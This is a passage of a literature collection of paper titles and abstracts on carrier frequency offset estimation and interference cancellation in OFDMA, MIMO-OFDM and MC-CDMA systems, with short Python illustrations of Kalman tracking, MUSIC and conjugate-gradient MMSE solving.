--- paper_title: Frequency Synchronization for Multiuser MIMO-OFDM System Using Bayesian Approach paper_content: This paper addresses the problem of frequency synchronization in multiuser multiple-input multiple-output orthogonal frequency-division multiplexing (MIMO-OFDM) systems. Different from existing work, a Bayesian approach is used in the parameter estimation problem. In this paper, the Bayes estimator for carrier frequency offset (CFO) estimation is proposed and the Bayesian Cramér-Rao bound (BCRB) is also derived in closed form. Direct implementation of the resultant estimation scheme with conventional methods is challenging since a high degree of mathematical sophistication is always required. To solve this problem, the Gibbs sampler is exploited with an efficient sample generation method. Simulation results illustrate the effectiveness of the proposed estimation scheme. --- paper_title: Joint Carrier Frequency Offset and Channel Estimation for Uplink MIMO-OFDMA Systems Using Parallel Schmidt Rao-Blackwellized Particle Filters paper_content: Joint carrier frequency offset (CFO) and channel estimation for uplink MIMO-OFDMA systems over time-varying channels is investigated. To cope with the prohibitive computational complexity involved in estimating multiple CFOs and channels, pilot-assisted and semi-blind schemes comprised of parallel Schmidt Extended Kalman filters (SEKFs) and Schmidt-Kalman Approximate Particle Filters (SK-APF) are proposed. In the SK-APF, a Rao-Blackwellized particle filter (RBPF) is developed to first estimate the nonlinear state variable, i.e., the desired user's CFO, through the sampling-importance-resampling (SIRS) technique. The individual user channel responses are then updated via a bank of Kalman filters conditioned on the CFO sample trajectories. Simulation results indicate that the proposed schemes can achieve highly accurate CFO/channel estimates, and that the particle filtering approach in the SK-APF outperforms the more conventional Schmidt Extended Kalman Filter. --- paper_title: A Novel Subspace Decomposition-Based Detection Scheme with Soft Interference Cancellation for OFDMA Uplink paper_content: In this paper, we propose a novel subspace decomposition-based detection scheme with the assistance of soft interference cancellation in the uplink of interleaved orthogonal frequency division multiple access (OFDMA) systems. By utilizing the inherent data structure, the interference is first separated from the desired symbol and then further decomposed into the one caused by the residues of decision errors and the other one by the undetected symbols in the successive interference cancellation (SIC) process. With such an ingenious interference decomposition along with the soft processing scheme, the new receiver can render more thorough interference cancellation, which in turn entails enhanced system performance. Moreover, for practical implementations, a low-complexity version, which deals only with the principal components of inter-carrier interference (ICI), is also addressed. Conducted simulations show that the developed receiver and its low-complexity implementation can provide superior performance compared with previous works and are resilient to the presence of carrier-frequency offsets (CFOs). The low complexity implementation, in particular, requires substantially lower computational overhead with only slight performance loss.
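Since the Schmidt-EKF / Rao-Blackwellized particle filter reference above treats the CFO as a dynamic state to be tracked, a heavily simplified illustration of that idea is a scalar Kalman filter driven by phase-increment measurements of a constant pilot. The random-walk CFO model, the linear measurement z_k = 2*pi*eps_k + noise and all variances below are assumptions for this toy; it is far simpler than the cited SK-APF.

```python
import numpy as np

# toy model (assumed): eps_k is a slow random walk; each measurement is the phase
# advance of a constant pilot over one step, z_k = 2*pi*eps_k + measurement noise
np.random.seed(4)
K, q, r = 200, 1e-8, 1e-3            # steps, process and measurement variances (assumed)
eps_true = 0.05 + np.cumsum(np.sqrt(q) * np.random.randn(K))
z = 2 * np.pi * eps_true + np.sqrt(r) * np.random.randn(K)

eps_hat, P, H = 0.0, 1.0, 2 * np.pi  # initial estimate, variance, measurement gain
for k in range(K):
    P += q                                   # predict (random-walk state)
    G = P * H / (H * P * H + r)              # Kalman gain
    eps_hat += G * (z[k] - H * eps_hat)      # measurement update
    P *= 1 - G * H                           # covariance update
print("true CFO:", eps_true[-1], " tracked CFO:", eps_hat)
```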
--- paper_title: An Improved Frequency Offset Estimation Based on Companion Matrix in Multi-User Uplink Interleaved OFDMA Systems paper_content: In this letter, we consider a multiuser uplink orthogonal frequency-division multiple access (OFDMA) system. To estimate the carrier frequency offset (CFO) efficiently, a modified pilot structure has been proposed to allow sufficient frequency separation between the subcarriers allocated to any two users. The proposed structure can reduce the ambiguity problem caused by the multiple signal classification (MUSIC) based algorithm when a CFO of one user is close to that of a different user. We present a CFO estimation method based on the companion matrix obtained using the received signal from the proposed pilot structure. Simulation results show that the proposed CFO estimator performs better than the conventional estimator and maintains its performance as the CFO range increases. --- paper_title: Low complexity scheme for carrier frequency offset estimation in orthogonal frequency division multiple access uplink paper_content: Maximum likelihood (ML) carrier-frequency offset estimation for orthogonal frequency-division multiple access uplink is a complex multi-parameter estimation problem. The ML approach is a global optima search problem, which is prohibitive for practical applications because of the requirement of multidimensional exhaustive search for a large number of users. There are a few attempts to reduce the complexity of ML search by applying evolutionary optimisation algorithms. In this study, the authors propose a novel canonical particle swarm optimisation (CPSO)-based scheme, to reduce the computational complexity without compromising the performance and premature convergence. The proposed technique is a two-step process, where, in the first step, low resolution alternating projection frequency estimation (APFE) is used to generate a single better positioned particle for CPSO, followed by an actual CPSO procedure in second step. The mean square error performance of the proposed scheme is compared with existing low complexity algorithms namely APFE and linear particle swarm optimisation with mutation. Simulation results presented in this study show that the new scheme completely avoids premature convergence for a large number of users as high as 32. --- paper_title: Joint Carrier Frequency Offset and Direction of Arrival Estimation via Hierarchical ESPRIT for Interleaved OFDMA/SDMA Uplink Systems paper_content: In this paper, we propose an efficient algorithm to jointly estimate the directions of arrival (DOAs) and carrier frequency offsets (CFOs) in interleaved orthogonal frequency division multiple access / space division multiple access (OFDMA/SDMA) uplink networks. The algorithm makes use of the signal structure by estimating the CFOs and DOAs in a hierarchical tree structure, in which two CFO estimations and one DOA estimation are employed alternatively. One special feature in the proposed algorithm is that the algorithm proceeds in a coarse-fine manner with temporal filtering or spatial beamforming being invoked between the parameter estimations to decompose the signals progressively into subgroups so as to enhance the estimation accuracy and lower the computational overhead. Simulations show that the proposed algorithm can provide satisfactory performance with increased channel capacity. 
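The companion-matrix, CPSO and hierarchical-ESPRIT estimators above all rely on the same algebraic structure of interleaved OFDMA: with P = N/Q, a user on subcarrier comb r_i contributes y_i[n + mP] = y_i[n] exp(j 2 pi m (r_i + eps_i) / Q), so each user appears as a complex exponential across the Q sub-blocks and subspace methods apply. The sketch below checks this with a toy two-user setup and a plain MUSIC grid search; the sizes, allocations and CFOs are assumed, and this is not the cited hierarchical ESPRIT algorithm.

```python
import numpy as np

np.random.seed(5)
N, Q = 64, 4                        # subcarriers and interleaving factor (assumed)
P = N // Q
users = {0: 0.21, 2: -0.14}         # {comb index r_i: normalized CFO eps_i} (assumed)

n = np.arange(N)
y = np.zeros(N, dtype=complex)
for r, eps in users.items():
    X = np.zeros(N, dtype=complex)
    X[r::Q] = np.exp(2j * np.pi * np.random.rand(P))        # unit-modulus data symbols
    y += np.fft.ifft(X) * np.sqrt(N) * np.exp(2j * np.pi * eps * n / N)
y += 0.05 * (np.random.randn(N) + 1j * np.random.randn(N))  # receiver noise

# interleaved structure: y[n + m*P] = sum_i s_i[n] * exp(j*2*pi*m*(r_i + eps_i)/Q)
Yb = y.reshape(Q, P).T                      # row n is a length-Q snapshot across sub-blocks
R = Yb.T @ Yb.conj() / P                    # Q x Q sample covariance of the snapshots

w, V = np.linalg.eigh(R)
En = V[:, : Q - len(users)]                 # noise subspace (smallest eigenvalues)
theta = np.linspace(0, Q, 4000, endpoint=False)
A = np.exp(2j * np.pi * np.outer(np.arange(Q), theta) / Q)  # steering vectors
music = 1.0 / np.sum(np.abs(En.conj().T @ A) ** 2, axis=0)
locmax = (music > np.roll(music, 1)) & (music > np.roll(music, -1))
peaks = theta[locmax][np.argsort(music[locmax])[-len(users):]]
print("estimated r_i + eps_i:", np.sort(peaks))   # expect roughly 0.21 and 1.86
```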
--- paper_title: MMSE-Based CFO Compensation for Uplink OFDMA Systems with Conjugate Gradient paper_content: In this paper, we present a low-complexity carrier frequency offset (CFO) compensation algorithm based on the minimum mean square error (MMSE) criterion for uplink orthogonal frequency division multiple access systems. CFO compensation with an MMSE filter generally requires an inverse operation on an interference matrix whose size equals the number of subcarriers. Thus, the computational complexity becomes prohibitively high when the number of subcarriers is large. To reduce the complexity, we employ the conjugate gradient (CG) method which iteratively finds the MMSE solution without the inverse operation. To demonstrate the efficacy of the CG method for our problem, we analyze the interference matrix and present several observations which provide insight on the iteration number required for convergence. The analysis indicates that for an interleaved carrier assignment scheme, the maximum iteration number for computing an exact solution is at most the same as the number of users. Moreover, for a general carrier assignment scheme, we show that the CG method can find a solution with far fewer iterations than the number of subcarriers. In addition, we propose a preconditioning technique which speeds up the convergence of the CG method at the expense of slightly increased complexity for each iteration. As a result, we show that the CFO can be compensated with substantially reduced computational complexity by applying the CG method. --- paper_title: Blind Carrier Frequency Offset Estimation for Interleaved OFDMA Uplink paper_content: In this paper, we develop two novel blind carrier frequency offset (CFO) estimators for interleaved orthogonal frequency division multiple access (OFDMA) uplink transmission in a multiantenna system. The first estimator is the subspace-based one and could blindly estimate multiple CFOs from a rank reduction approach. The second estimator is based on the maximum likelihood (ML) approach and improves the performance as compared to the first one. The higher computational complexity of the ML estimator is alleviated by the alternating projection (AP) method. Both the proposed estimators support fully loaded data transmissions, i.e., all subcarriers being occupied, which provides higher bandwidth efficiency as compared to the existing schemes. The numerical results are then provided to corroborate the proposed studies. --- paper_title: Low complexity LS and MMSE based CFO compensation techniques for the uplink of OFDMA systems paper_content: Orthogonal frequency division multiple access (OFDMA), where different subcarriers are allocated to different users, has been adopted for the uplink of several standards and has attracted a great deal of attention as a result. However, OFDMA is highly sensitive to carrier frequency offset (CFO) between the transmitter and receiver. In the uplink, different carrier frequency offsets due to different users can adversely affect subcarrier orthogonality. We propose a low complexity CFO compensation approach that addresses this problem while maintaining optimal performance. This approach is based on the least squares and minimum mean square error criteria applicable to interleaved and block interleaved carrier assignment schemes. The proposed algorithms use the special block circulant property of the interference matrix. 
In contrast to existing CFO compensation techniques, our algorithms do not rely on iterations or approximations. We present our approach in this paper and describe how a considerable reduction in computational complexity can be achieved by adopting it. --- paper_title: A Time Domain Inverse Matrix Receiver for CFO Suppression in WIMAX Uplink System paper_content: In orthogonal frequency division multiple access (OFDMA) uplink system, orthogonal multiple subcarriers are assigned to different users for parallel high data rate communications. However, carrier frequency offset (CFO), which is mainly due to oscillator mismatches and/or Doppler shift, will destroy the orthogonality among subcarriers and introduce intercarrier interference (ICI) as well as multiple-access interference (MAI) in uplink scenario. Thus, system performance will be seriously degraded. To overcome this problem, it is of great importance to do research on suppression of the interferences caused by CFO. In this paper, we proposed a novel time domain inverse matrix receiver to suppress the interference of multiple CFOs. Compared with the conventional frequency domain direct ZF inverse matrix method, which has high complexity in obtaining the ICI matrix and its inverse matrix, the proposed method has very low complexity in obtaining the interference matrix. Furthermore, the signal after interference suppression is a frequency domain signal. Thus the receiver complexity can be simplified. Simulation results show that this algorithm has almost the same performance to the frequency domain direct ZF inverse matrix method. --- paper_title: Blind carrier frequency offset estimation for tile-based orthogonal frequency division multiple access uplink with multi-antenna receiver paper_content: In this study, the authors propose a blind carrier frequency offset (CFO) estimation method for the tile structure orthogonal frequency division multiple access (OFDMA) uplink with multi-antenna receiver. They employ an iterative approach to extract the signal component for each user gradually and propose a carefully designed CFO estimator to update the CFO estimate during the iterative procedure. The key ingredient of the proposed method is using few subcarriers on both sides within each tile as the ‘guard subcarriers’, which can greatly mitigate the effect of multi-user interference. The proposed method supports not only fully loaded transmissions, but also the generalised assignment scheme that provides the flexibility for dynamical resource allocation. The numerical results are provided, which indicate that the proposed method can almost converge to the analytical lower bound within a few iterative cycles. It is seen that the proposed method also outperforms the existing competitor with multi-antenna receiver in terms of estimation performance, especially with few adopted blocks. --- paper_title: Low Complexity Pilot Assisted Carrier Frequency Offset Estimation for OFDMA Uplink Systems paper_content: In this letter, we propose a low complexity pilot aided carrier frequency offset (CFO) estimation algorithm for orthogonal frequency division multiplexing access (OFDMA) uplink systems based on two consecutive received OFDMA symbols. Assuming that the channels and the CFOs are static over the two consecutive symbols, we express the second received OFDMA symbol in terms of the CFOs and the first OFDMA symbol. 
Based on this signal model, a new estimation algorithm which obtains the CFOs by minimizing the mean square distance between the received OFDMA symbol and its regenerated signal is provided. Also, we implement the proposed algorithm via fast Fourier transform (FFT) operations by utilizing the block matrix inversion lemma and the conjugate gradient method. Simulation results show that the proposed algorithm approaches the average Cramer Rao bound for moderate and high signal to noise ratio (SNR) regions. Moreover, the algorithm can be applied for any carrier assignment schemes with low complexity. --- paper_title: Trade off between Frequency Diversity and Robustness to Carrier Frequency Offset in Uplink OFDMA System paper_content: In this paper, we investigate the effect of subcarrier allocation on the CFO for uplink OFDMA systems. Carriers are allocated to the users in order to get maximum throughput by making use of the channel frequency diversity. But in systems with CFO, while allocating the carriers to the users, attention must be paid to the ICI resulting due to CFO. In this paper we propose a carrier allocation scheme that provides a good compromise between the throughput maximization and robustness to the CFO induced ICI for systems with and without channel state information (CSI). --- paper_title: Frequency Offset Estimation in 3G LTE paper_content: 3G Long Term Evolution (LTE) technology aims at addressing the increasing demand for mobile multimedia services in high user density areas while maintaining good performance in extreme channel conditions such as high mobility of High Speed Trains. This paper focuses on the latter aspect and compares different algorithms for the uplink frequency offset estimation in LTE Base Stations (eNodeB). A frequency-domain maximum-likelihood based solution is proposed, taking profit of the available interference-free OFDM symbols de-mapped (or de-multiplexed) at the output of the FFT of an OFDMA multi-user receiver. It is shown to outperform the state-of-the-art CP correlation approach on both link-level performance and complexity aspects. --- paper_title: ML Detection with Successive Group Interference Cancellation for Interleaved OFDMA Uplink paper_content: To mitigate the interference caused by multiple carrier frequency offsets (CFO) of distributed users, a maximum likelihood (ML) detection with group-wise successive interference cancellation (GSIC) is proposed for interleaved Orthogonal Frequency Division Multiplexing Access (OFDMA) uplink. By exploiting the interference characteristics and the finite alphabet property of transmitted symbols, the proposed scheme first extracts the block diagonal of the frequency domain channel matrix and then employs ML detection via sphere decoding in each block. The decisions obtained from the detected blocks are used to mitigate the interference to the residual blocks. Numerical results show that the proposed scheme outperforms both the minimum mean square error (MMSE) detection and parallel interference cancellation (PIC) with affordable computational complexity. --- paper_title: Frequency Synchronization for the OFDMA Uplink Based on the Tile Structure of IEEE 802.16e paper_content: The multiple carrier frequency offsets (CFOs) of multiple users make frequency synchronization a challenging task in the orthogonal frequency-division multiple-access (OFDMA) uplink. 
In this paper, a computationally efficient iterative CFO estimation and compensation method for the OFDMA uplink with the generalized subcarrier allocation scheme (CAS) based on the tile structure of IEEE 802.16e is proposed. The proposed method only needs a few iteration cycles for its convergence. It greatly lowers the computational cost compared with the existing methods and can achieve better CFO estimation and compensation performance. --- paper_title: Carrier Frequency Offset Estimation in OFDMA using Digital Filtering paper_content: This letter deals with the frequency synchronization problem in the uplink of OFDMA communications systems with interleaved or generalized subcarrier allocation. An algorithm to estimate the carrier frequency offsets (CFOs) of all the active users is presented. The estimator relies upon finding the zeros of a suitably designed filter. The design of the filter boils down to the solution of a least squares (LS) problem and thus entails relatively low complexity. While under low subcarrier load conditions the estimation root mean squared error (RMSE) is higher than that of other existing methods, under heavy or full load it achieves comparable and even superior performance. --- paper_title: Carrier Frequency Offset Estimation for Uplink OFDMA Using Partial FFT Demodulation paper_content: Fast and accurate Carrier Frequency Offset (CFO) estimation is a problem of significance in many multi-carrier modulation based systems, especially in uplink Orthogonal Frequency Division Multiple Access (OFDMA) where the presence of multiple users exacerbates the inter-carrier interference (ICI) and results in multi-user interference (MUI). In this paper, a new technique called partial FFT demodulation is proposed. Estimators for the CFO are derived by considering an approximated matched filter for each user, implemented efficiently using several FFTs operating on sub-intervals of an OFDM block. Through simulations, the feasibility and performance of the proposed estimators are demonstrated. Associated trade-offs are discussed. --- paper_title: Generalised grouped minimum mean-squared error-based multi-stage interference cancellation scheme for orthogonal frequency division multiple access uplink systems with carrier frequency offsets paper_content: In uplink orthogonal frequency division multiple access (OFDMA) systems with carrier frequency offsets (CFOs), there is always a dilemma in that high performance and low complexity cannot be obtained simultaneously. In this study, in order to achieve a better trade-off between performance and complexity, the authors propose a grouped minimum mean squared error (G-MMSE)-based multi-stage interference cancellation (MIC) scheme. The first stage of the proposed scheme is a G-MMSE detector, where the signal is detected group by group using banks of partial MMSE filters. The signal group can be either user based or subcarrier based. Multiple novel interference cancellation (IC) units are serially concatenated with the G-MMSE detector. Reusing the filters in the G-MMSE detector significantly reduces the computational complexity in the subsequent IC units as shown by the complexity analysis. The performance of the proposed G-MMSE-MIC schemes is evaluated by theoretical analysis and simulation. The results show that the proposed schemes outperform other existing schemes with considerably low complexity.
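Several of the receivers above, notably the conjugate-gradient MMSE compensators, avoid inverting the large interference matrix by solving the normal equations iteratively. As a sketch under simplifying assumptions, the generic complex conjugate-gradient routine below solves (A^H A + sigma^2 I) x = A^H y for a random stand-in matrix; it does not reproduce the banded or block-circulant structure that the cited papers exploit for further savings.

```python
import numpy as np

def conjugate_gradient(B, b, iters, tol=1e-10):
    """Solve B x = b for Hermitian positive-definite B without forming B^{-1}."""
    x = np.zeros_like(b)
    r = b - B @ x
    p = r.copy()
    rs = np.vdot(r, r).real
    for _ in range(iters):
        Bp = B @ p
        alpha = rs / np.vdot(p, Bp).real
        x = x + alpha * p
        r = r - alpha * Bp
        rs_new = np.vdot(r, r).real
        if rs_new < tol:
            break
        p = r + (rs_new / rs) * p
        rs = rs_new
    return x

# toy use: MMSE-style solve x = (A^H A + sigma2 I)^{-1} A^H y without any inversion
np.random.seed(6)
N, sigma2 = 16, 0.01
A = np.random.randn(N, N) + 1j * np.random.randn(N, N)   # stand-in interference matrix
y = np.random.randn(N) + 1j * np.random.randn(N)
B = A.conj().T @ A + sigma2 * np.eye(N)
x_cg = conjugate_gradient(B, A.conj().T @ y, iters=N)
print("deviation from direct solve:", np.linalg.norm(x_cg - np.linalg.solve(B, A.conj().T @ y)))
```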
--- paper_title: Blind Maximum-Likelihood Carrier-Frequency-Offset Estimation for Interleaved OFDMA Uplink Systems paper_content: Blind maximum-likelihood (ML) carrier-frequency-offset (CFO) estimation is considered to be difficult in interleaved orthogonal frequency-division multiple-access (OFDMA) uplink systems. This is because multiple CFOs have to be simultaneously estimated (each corresponding to a user's carrier), and an exhaustive multidimensional search is required. The computational complexity of the search may be prohibitively high. Methods such as the multiple signal classification and the estimation of signal parameters via the rotational invariance technique have been proposed as alternatives. However, these methods cannot maximize the likelihood function, and the performance is not optimal. In this paper, we propose a new method to solve the problem. With our formulation, the likelihood function can be maximized, and the optimum solution can be obtained by solving a polynomial function. Compared with the exhausted search, the computational complexity can be reduced dramatically. Simulations show that the performance of the proposed method can approach that of the Cramer-Rao lower bound. --- paper_title: Carrier Frequency Offset Tracking in the IEEE 802.16e OFDMA Uplink paper_content: The IEEE 802.16e standard for nomadic wireless metropolitan area networks adopts orthogonal frequency-division multiple-access (OFDMA) as an air interface. In these systems, residual carrier frequency offsets (CFOs) between the uplink signals and the base station local oscillator give rise to interchannel interference (ICI) as well as multiple access interference (MAI). Accurate CFO estimation and compensation is thus necessary to avoid a serious degradation of the error-rate performance. In this work, we address the problem of CFO tracking in the IEEE 802.16e uplink and present a closed-loop solution based on the least-squares (LS) principle. In doing so, we exploit a set of pilot tones that are available in each user's subchannel. The resulting scheme can be implemented with affordable complexity and is able to reliably track the CFOs of all active users. When used in conjunction with a frequency offset compensator, it can effectively mitigate ICI and MAI, thereby allowing channel equalization and data detection to follow directly. Numerical simulations are used to demonstrate the effectiveness of the proposed solution in the presence of residual time-varying frequency offsets. --- paper_title: A Scheme to Support Concurrent Transmissions in OFDMA Based Ad Hoc Networks paper_content: In this paper, we propose a novel system architecture to realize OFDMA in ad hoc networks. A partial time synchronization strategy is presented based on the proposed system model. This proposed scheme can support concurrent transmission without global clock synchronization. We also propose a null subcarrier based frequency synchronization scheme to estimate and compensate frequency offsets in a multiple user environment. The simulation results show a good performance of our proposed synchronization scheme in terms of frequency offset estimation error and variance. --- paper_title: Efficient carrier frequency offset estimation for orthogonal frequency-division multiple access uplink with an arbitrary number of subscriber stations paper_content: An efficient method is proposed to estimate the carrier frequency offsets (CFOs) in the orthogonal frequency-division multiple access (OFDMA) uplink. 
The conventional alternating projection method is accelerated by utilising the inherited properties of the matrices involved. The multiplication of large sparse projection matrices can be elegantly transformed to a series of products involving small dense matrices, and the inverse operation of these large matrices can be substituted by direct computations. Hence, the computational cost is significantly reduced without compromising the accuracy of the CFO estimation. --- paper_title: MCMOE-Based CFO Estimator Aided With the Correlation Matrix Approach for Alamouti's STBC MC-CDMA Downlink Systems paper_content: This paper addresses the estimation problem of carrier frequency offset (CFO) in the downlink transmission of space-time block-coded multicarrier code-division multiple-access (STBC MC-CDMA) systems over multipath fading. This study proposes a multiply constrained minimum output energy (MCMOE)-based blind CFO estimator, which is simply assisted by the presented correlation matrix approach to efficiently achieve the CFO estimate. We formulate a two-level CFO estimator by optimizing the receiver output power, as well as the data correlation matrix. At the first level, all possible CFO candidates are found by evaluating the well-defined estimated merit figure. Then, exploiting multiple constraints in the design of the MCMOE receiver, a criterion is used in level two to determine the exact CFO estimate. Numerical results are presented to verify that both precise CFO estimation and reliable error performance can be achieved, even when the channel is dominated by noise because the impact of CFO on the output signal-to-interference-plus-noise ratio (SINR) and bit error rate (BER) are effectively removed by the proposed CFO estimator. --- paper_title: SINR Lower Bound Based Multiuser Detector for Uplink MC-CDMA Systems with Residual Frequency Offset paper_content: For uplink multi-carrier code-division multiple access (MC-CDMA) systems, we propose a multiuser detector that is robust to a small residual frequency offset existing after frequency offset estimation and compensation. In this paper, when the residual frequency offset is normalized by subcarrier spacing, it is called a normalized residual frequency offset (NRFO). In the proposed scheme, we first derive a lower bound of the signal-to-interference plus noise ratio (SINR) of the desired user when the NRFO of the desired user is bounded by a small value and the value is known to the receiver. We then design a detection filter to maximize the SINR lower bound. Simulation results show that the proposed scheme has better SINR and bit error rate (BER) performances in a high signal-to-noise ratio (SNR) region than a conventional minimum mean square error (MMSE) receiver that ignores the NRFO. --- paper_title: Widely Linear MVDR Beamformers for Noncircular Signals Based on Time-Averaged Second-Order Noncircularity Coefficient Estimation paper_content: The optimal widely linear (WL) minimum variance distortionless response (MVDR) beamformer, which has a powerful performance for the reception of a noncircular signal, was proposed by Chevalier in 2009. Nevertheless, in spectrum monitoring or passive listening, the optimal WL MVDR beamformer is hard to implement due to an unknown second-order (SO) noncircularity coefficient. This paper aims at estimating the time-averaged SO noncircularity coefficient of a desired noncircular signal, whose waveform is unknown but whose steering vector is known, in the context of the optimal WL MVDR beamformer. 
The proposed noncircularity coefficient estimator can process 2N - 1 rectilinear signals at most using an array of N sensors. Moreover, a frequency-shift WL MVDR beamforming algorithm is proposed for a noncircular signal having a nonnull frequency offset or carrier residue, jointly with the estimation of the frequency offset of the rectilinear signal. Due to the inevitable estimation error of the time-averaged SO noncircularity coefficient, a diagonal loading technique is used to enhance the robustness of the optimal WL beamformers. Simulations are shown to verify the effectiveness of the proposed algorithms. --- paper_title: Iterative frequency-domain fractionally spaced receiver for zero-padded multi-carrier code division multiple access systems paper_content: In this study, the authors propose an improved frequency-domain fractionally spaced (FDFS) minimum mean square error (MMSE) receiver for zero-padded multi-carrier code division multiple access (MC-CDMA) systems when the guard interval is not enough to avoid the inter-symbol interference (ISI) caused by the multipath channel. The proposed novel iterative FDFS-based receivers firstly reconstruct the received symbol to reduce the ISI and then followed by the FDFS-based equalisers to minimise the effect of ISI and inter-carrier interference (ICI) caused by carrier frequency offset (CFO) and Doppler shifts. A few iterations are performed to achieve the expected bit error rate (BER) performance. To reduce the receiver complexity, the novel simplified diagonal FDFS-based receivers with a fixed noise variance are developed with slight performance degradation. The proposed iterative receivers have never been studied in the existing literature. Simulation results show that the proposed iterative FDFS-based receivers can significantly improve the BER performance of the conventional FDFS-MMSE receiver in severe multiple interferences environments caused by multipath, CFO and Doppler shift. --- paper_title: Multi-tone CDMA design for arbitrary frequency offsets using orthogonal code multiplexing at the transmitter and a tunable receiver paper_content: The authors propose a new multi-tone (MT) code division multiple access (CDMA) design which has a superior bit error rate (BER) performance than conventional MT CDMA in the presence of frequency offset. The design involves multiplexing of Walsh codes onto the sub-carriers in conjunction with double differential modulation. To exploit the full potential of the design a partial correlation receiver has been proposed. Depending on the signal-to-noise ratio (SNR) and frequency offset it is possible to tune this receiver for the best possible performance. The simulated BER performance of the proposed system has been found to be better than MT CDMA for small as well as large frequency offsets for both single and multi-user systems in additive white Gaussian noise (AWGN) and Rayleigh fading channels. --- paper_title: Simplified Multiaccess Interference Reduction for MC-CDMA With Carrier Frequency Offsets paper_content: Multicarrier code-division multiple-access (MC-CDMA) system performance can severely be degraded by multiaccess interference (MAI) due to the carrier frequency offset (CFO). We argue that MAI can more easily be reduced by employing complex carrier interferometry (CI) codes. We consider the scenario with spread gain N, multipath length L, and N users, i.e., a fully loaded system. 
It is proved that, when CI codes are used, each user only needs to combat 2(L - 1) (rather than N - 1) interferers, even in the presence of CFO. It is shown that this property of MC-CDMA with CI codes in a CFO channel can be exploited to simplify three multiuser detectors, namely, parallel interference cancellation (PIC), maximum-likelihood, and decorrelating multiuser detectors. The bit-error probability (BEP) for MC-CDMA with binary phase-shift keying (BPSK) modulation and single-stage PIC and an upper bound for the minimum error probability are derived. Finally, simulation results are given to corroborate theoretical results. --- paper_title: MUI-Reducing Spreading Code Design for BS-CDMA in the Presence of Carrier Frequency Offset paper_content: Using mutually shift-orthogonal spreading codes, block-spread code-division multiple access (BS-CDMA) systems have been shown to achieve multiuser interference (MUI)-free reception when synchronization between the base station and the subscriber stations is achieved. In practice, when carrier frequency offset (CFO) is present, orthogonality among users is destroyed, and MUI occurs. This paper presents three methods of designing the spreading and despreading codes for uplink BS-CDMA systems to reduce MUI due to CFO. We show through rigorous derivation that all three codes can completely eliminate MUI due to CFO. In particular, by fixing the spreading codes at the transmitter, despreading codes that were obtained by minimizing the interference power or their cross correlation with the spreading codes are shown to yield a performance close to a synchronous system. The advantages and disadvantages of the BS-CDMA systems using the three proposed codes are discussed. --- paper_title: Total Inter-Carrier Interference Cancellation for MC-CDMA System in Mobile Environment paper_content: Multi-carrier code division multiple access (MC-CDMA)has been considered as a strong candidate for next generation wireless communication system due to its excellent performance in multi-path fading channel and simple receiver structure. However, like all the multi-carrier transmission technologies such as OFDM, the inter-carrier interference (ICI) produced by the frequency offset between the transmitter and receiver local oscillators or by Doppler shift due to high mobility causes significant BER (bit error rate) performance degradation in MC-CDMA system. Many ICI cancellation methods such as windowing and frequency domain coding have been proposed in the literature to cancel ICI and improve the BER performance for multi-carrier transmission technologies. However, existing ICI cancellation methods do not cancel ICI entirely and the BER performance after ICI cancellation is still much worse than the BER performance of original system without ICI. Moreover, popular ICI cancellation methods like ICI self-cancellation reduce ICI at the price of lowering the transmission rate and reducing the bandwidth efficiency. Other frequency-domain coding methods do not reduce the data rate, but produce less reduction in ICI as well. In this paper, we propose a novel ICI cancellation scheme that can eliminate the ICI entirely and offer a MC-CDMA mobile system with the same BER performance of a MC-CDMA system without ICI. More importantly, the proposed ICI cancellation scheme (namely Total ICI Cancellation) does not lower the transmission rate or reduce the bandwidth efficiency. 
Specifically, by exploiting frequency offset quantization, the proposed scheme takes advantage of the orthogonality of the ICI matrix and offers perfect ICI cancellation and significant BER improvement at linearly growing cost. Simulation results in AWGN channel and multi-path fading channel confirm the excellent performance of the proposed Total ICI Cancellation scheme in the presence of frequency offset or time variations in the channel, outperforming existing ICI cancellation methods. --- paper_title: Cluster-Based Differential Energy Detection for Spectrum Sensing in Multi-Carrier Systems paper_content: This paper presents a novel differential energy detection scheme for multi-carrier systems, which can form fast and reliable decision of spectrum availability even in very low signal-to-noise ratio (SNR) environment. For example, the proposed scheme can reach 90% in probability of detection (PD) and 10% in probability of false alarm (PFA) for the SNRs as low as -21 dB, while the observation length is equivalent to 2 multi-carrier symbol duration. The underlying initiative of the proposed scheme is applying order statistics on the clustered differential energy-spectral-density (ESD) in order to exploit the channel frequency diversity inherent in high data-rate communications. Specifically, to enjoy a good frequency diversity, the clustering operation is utilized to group uncorrelated subcarriers, while, the differential operation applied onto each cluster can effectively remove the noise floor and consequently overcome the impact of noise uncertainty while exploiting the frequency diversity. More importantly, the proposed scheme is designed to allow robustness in terms of both, time and frequency offsets. In order to analytically evaluate the proposed scheme, PFA and PD for Rayleigh fading channel are derived. The closed-form expressions show a clear relationship between the sensing performance and the cluster size, which is an indicator of the diversity gain. Moreover, we are able to observe up to 10 dB gain in the performance compared to the state-of-the-art spectrum sensing schemes. --- paper_title: Secondary Transceiver Design in the Presence of Frequency Offset between Primary and Secondary Systems paper_content: When both primary and secondary systems are orthogonal frequency division multiplexing modulated and are non-cooperative, carrier frequency offset between the systems is inevitable to cause harmful interference. In this paper, we jointly optimize secondary transceivers assuming that the frequency offset between the secondary transmitter (ST) and the primary receiver (PR) and different channel information from the ST to the PR are known at the ST. We first derive unified interference constraints and obtain the secondary transceivers minimizing the mean square error through convex optimization techniques. We then derive closed-form transceivers for several special cases to reveal the impact of the frequency offset on the secondary transceivers. We show that when there is no frequency offset between the ST and the PR, the optimal processing at the ST is power allocation. Otherwise, both power allocation and precoding are necessary. The impact of the frequency offset on the performance of both systems increases as the interference constraints become tighter and the bandwidth of the primary system becomes smaller. 
When the proposed transceivers are used, the performance of the secondary system is robust to the frequency offset and the performance of the primary system degrades little due to the remanent frequency offset. --- paper_title: Performance Analysis of Arbitrarily-Shaped Underlay Cognitive Networks: Effects of Secondary User Activity Protocols paper_content: This paper analyzes the performance of the primary users (PUs) and secondary users (SUs) in an arbitrarily-shaped underlay cognitive network. In order to meet the interference threshold requirement for a primary receiver at an arbitrary location, we consider different SU activity protocols that limit the number of active SUs. We propose a framework, based on the moment-generating function of the interference due to a random SU, to analytically compute the outage probability in the primary network, as well as the average number of active SUs in the secondary network. We also propose a cooperation-based SU activity protocol in the underlay cognitive network that includes the existing threshold-based protocol as a special case. We study the average number of active SUs for the different SU activity protocols, subject to a given outage probability constraint at the PU, and we employ it as an analytical approach to compare the effect of different SU activity protocols on the performance of the primary and secondary networks. --- paper_title: Breaking Spectrum Gridlock With Cognitive Radios: An Information Theoretic Perspective paper_content: Cognitive radios hold tremendous promise for increasing spectral efficiency in wireless 